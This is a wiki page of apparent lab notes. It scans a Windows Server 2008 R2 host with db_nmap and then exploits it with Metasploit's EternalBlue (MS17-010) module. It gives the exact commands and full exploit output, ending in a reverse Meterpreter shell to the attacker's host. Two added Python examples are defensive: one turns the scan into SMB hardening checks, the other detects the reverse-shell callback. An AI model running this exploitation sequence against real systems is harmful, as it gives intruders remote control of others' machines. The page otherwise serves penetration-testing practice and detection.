Metasploit win2k8 Tasks: Difference between revisions
Revision as of 28 August 2024, 13:59
Starting Metasploit
First scan
- db_nmap -sV -p- 10.0.10.107
Display the results
- services
host         port   proto  name                  state  info
----         ----   -----  ----                  -----  ----
10.0.10.107  22     tcp    ssh                   open   OpenSSH 7.1 protocol 2.0
10.0.10.107  135    tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  139    tcp    netbios-ssn           open   Microsoft Windows netbios-ssn
10.0.10.107  445    tcp    microsoft-ds          open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.10.107  3000   tcp    http                  open   WEBrick httpd 1.3.1 Ruby 2.3.3 (2016-11-21)
10.0.10.107  3306   tcp    mysql                 open   MySQL 5.5.20-log
10.0.10.107  3389   tcp    tcpwrapped            open
10.0.10.107  4848   tcp    ssl/http              open   Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.0.10.107  7676   tcp    java-message-service  open   Java Message Service 301
10.0.10.107  8009   tcp    ajp13                 open   Apache Jserv Protocol v1.3
10.0.10.107  8022   tcp    http                  open   Apache Tomcat/Coyote JSP engine 1.1
10.0.10.107  8031   tcp    ssl/unknown           open
10.0.10.107  8080   tcp    http                  open   Sun GlassFish Open Source Edition 4.0
10.0.10.107  8181   tcp    ssl/intermapper       open
10.0.10.107  8383   tcp    http                  open   Apache httpd
10.0.10.107  8443   tcp    ssl/https-alt         open
10.0.10.107  9200   tcp    wap-wsp               open
10.0.10.107  49152  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49153  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49154  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49157  tcp                          open
10.0.10.107  49158  tcp    msrpc                 open   Microsoft Windows RPC
First finding
Based on the Nmap results, the Windows Server 2008 R2 machine has several open ports that indicate services which could be targets for SMB (Server Message Block) vulnerabilities. The ports of interest for SMB in this case are:
- Port 139 (netbios-ssn)
- Port 445 (microsoft-ds)
Both ports are used by SMB services, which are frequently vulnerable to exploits such as EternalBlue (MS17-010) or MS08-067 (NetAPI). These exploits are known to allow remote code execution.
Search
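The finding above is reached by reading the `services` table by eye. The following is an added example (not from the page or from Metasploit) that does the same triage in code: it parses rows in the layout of the `services` listing, collects the open SMB ports per host, and flags hosts whose banner points at an OS generation that shipped with SMBv1 enabled, turning that into the hardening checks an administrator should run. The sample rows are typed in for this example and include one invented host (10.0.10.108) with a non-legacy banner; the banner marker list is a heuristic chosen here, not a Metasploit feature.

```python
import re
from dataclasses import dataclass

# Constructed sample (typed in for this example, not live tool output): a few
# rows in the layout of msfconsole's `services` listing, with one extra host
# (10.0.10.108) invented to show a non-legacy banner.
SERVICES_OUTPUT = """\
host         port   proto  name          state  info
----         ----   -----  ----          -----  ----
10.0.10.107  22     tcp    ssh           open   OpenSSH 7.1 protocol 2.0
10.0.10.107  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.0.10.107  445    tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.10.107  3389   tcp    tcpwrapped    open
10.0.10.107  49157  tcp                  open
10.0.10.107  49158  tcp    msrpc         open   Microsoft Windows RPC
10.0.10.108  445    tcp    microsoft-ds  open   Windows 10 Pro 19041 microsoft-ds
"""

SMB_PORTS = {139, 445}
# Banner fragments that indicate an OS generation shipped with SMBv1 enabled
# by default; a heuristic chosen for this example, not a Metasploit feature.
LEGACY_OS_MARKERS = ("2003", "2008", "Windows XP", "Vista", "Windows 7")


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str    # may be empty, as for port 49157 above
    state: str
    info: str


# One row: host, numeric port, proto, optional name, state, free-text info.
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(tcp|udp)\s+(\S*)\s+(open|closed|filtered)\s*(.*)$")


def parse_services(text: str) -> list[Service]:
    """Parse the services table; header and separator lines do not match ROW_RE."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Service(m[1], int(m[2]), m[3], m[4], m[5], m[6].strip()))
    return rows


def smb_exposure(rows: list[Service]) -> dict:
    """Per host: open SMB ports and whether any banner points at a legacy OS."""
    report = {}
    for s in rows:
        if s.state != "open" or s.port not in SMB_PORTS:
            continue
        entry = report.setdefault(s.host, {"smb_ports": [], "legacy_banner": False, "banner": ""})
        entry["smb_ports"].append(s.port)
        if any(marker in s.info for marker in LEGACY_OS_MARKERS):
            entry["legacy_banner"] = True
            entry["banner"] = s.info
    for entry in report.values():
        entry["smb_ports"].sort()
    return report


def hardening_actions(report: dict) -> list[str]:
    """Turn the exposure report into the checks an administrator should run."""
    actions = []
    for host, e in sorted(report.items()):
        ports = ",".join(str(p) for p in e["smb_ports"])
        if e["legacy_banner"]:
            actions.append(f"{host}: SMB on {ports}, banner '{e['banner']}' -> "
                           "verify MS17-010 patch status, disable SMBv1, restrict 139/445")
        else:
            actions.append(f"{host}: SMB on {ports} -> confirm SMBv1 is disabled and "
                           "139/445 are reachable only from management networks")
    return actions


if __name__ == "__main__":
    for line in hardening_actions(smb_exposure(parse_services(SERVICES_OUTPUT))):
        print(line)
```

The regex rather than a split on whitespace is what keeps the row for port 49157 (empty `name` column) parseable; a plain `split()` would shift its `state` into the `name` slot.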
- search MS17-010
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Checking the EternalBlue (MS17-010) exploit
The MS17-010 (EternalBlue) exploit targets a well-known vulnerability in older Windows versions, including Windows Server 2008 R2. It is a vulnerability in the SMBv1 protocol.
Use
- use exploit/windows/smb/ms17_010_eternalblue
- set RHOSTS 10.0.10.107
- set LHOST 10.0.10.101
- run
[*] Started reverse TCP handler on 10.0.10.101:4444
[*] 10.0.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.10.107:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.10.107:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.10.107:445 - The target is vulnerable.
[*] 10.0.10.107:445 - Connecting to target for exploitation.
[+] 10.0.10.107:445 - Connection established for exploitation.
[+] 10.0.10.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.10.107:445 - CORE raw buffer dump (51 bytes)
[*] 10.0.10.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.0.10.107:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.0.10.107:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.0.10.107:445 - 0x00000030 6b 20 31 k 1
[+] 10.0.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.10.107:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.10.107:445 - Sending all but last fragment of exploit packet
[*] 10.0.10.107:445 - Starting non-paged pool grooming
[+] 10.0.10.107:445 - Sending SMBv2 buffers
[+] 10.0.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.10.107:445 - Sending final SMBv2 buffers.
[*] 10.0.10.107:445 - Sending last fragment of exploit packet!
[*] 10.0.10.107:445 - Receiving response from exploit packet
[+] 10.0.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.10.107:445 - Sending egg to corrupted connection.
[*] 10.0.10.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.0.10.107
[*] Meterpreter session 1 opened (10.0.10.101:4444 -> 10.0.10.107:49358) at 2024-08-28 09:58:43 -0400
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- meterpreter >
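The run above leaves a recognisable pattern on the network: the attacking host (10.0.10.101) connects to the target's port 445, and seconds later the target opens a connection back to 10.0.10.101:4444, the reverse TCP handler, from ephemeral port 49358. The following is an added example (not from the page or from Metasploit) that correlates flow records to flag exactly that sequence: an SMB server making an outbound connection to a client that had just spoken SMB to it. The flow records are constructed for this example; the fourth line mirrors the session line in the output above, the others are filler that should not alert. The record layout and the 120-second correlation window are assumptions to adapt to your own sensor.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

SMB_PORT = 445
CALLBACK_WINDOW = timedelta(seconds=120)   # assumption: tune to your environment

# Constructed flow log (not captured from the lab): time, src, sport, dst, dport.
# The fourth line mirrors the Meterpreter session line from the run above; the
# other lines are filler that must not produce an alert.
FLOWS = """\
2024-08-28 09:57:50 10.0.10.55  51011 10.0.10.107 445
2024-08-28 09:58:31 10.0.10.101 40122 10.0.10.107 445
2024-08-28 09:58:35 10.0.10.101 40123 10.0.10.107 445
2024-08-28 09:58:43 10.0.10.107 49358 10.0.10.101 4444
2024-08-28 09:59:10 10.0.10.107 49360 10.0.10.20  443
2024-08-28 10:03:00 10.0.10.55  51090 10.0.10.101 4444
"""


@dataclass
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


@dataclass
class Alert:
    host: str              # the SMB server that made the outbound connection
    peer: str              # the client that had just spoken SMB to it
    port: int              # destination port of the callback
    ts: datetime
    seconds_after_smb: float


def parse_flows(text: str) -> list[Flow]:
    """Parse the constructed five-column flow records; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts = datetime.strptime(f"{parts[0]} {parts[1]}", "%Y-%m-%d %H:%M:%S")
        flows.append(Flow(ts, parts[2], int(parts[3]), parts[4], int(parts[5])))
    return flows


def detect_callbacks(flows: list[Flow], window: timedelta = CALLBACK_WINDOW) -> list[Alert]:
    """Alert when host H connects out to peer P shortly after P connected to H:445."""
    last_smb = {}   # (server, client) -> time the client last connected to server:445
    alerts = []
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dport == SMB_PORT:
            last_smb[(f.dst, f.src)] = f.ts
            continue
        seen = last_smb.get((f.src, f.dst))
        if seen is not None and f.ts - seen <= window:
            alerts.append(Alert(f.src, f.dst, f.dport, f.ts, (f.ts - seen).total_seconds()))
    return alerts


if __name__ == "__main__":
    for a in detect_callbacks(parse_flows(FLOWS)):
        print(f"{a.ts} {a.host} -> {a.peer}:{a.port} "
              f"{a.seconds_after_smb:.0f}s after inbound SMB from {a.peer}")
```

The correlation key is the (server, client) pair, not the port 4444 alone: a handler can listen on any port, whereas a file server initiating a connection back to a machine that just connected to its SMB service is unusual regardless of port. The filler records show the intended negatives: a workstation connecting to 445 with no callback, the server's outbound HTTPS to an unrelated host, and a later connection to port 4444 from a host that never received SMB traffic from 10.0.10.101.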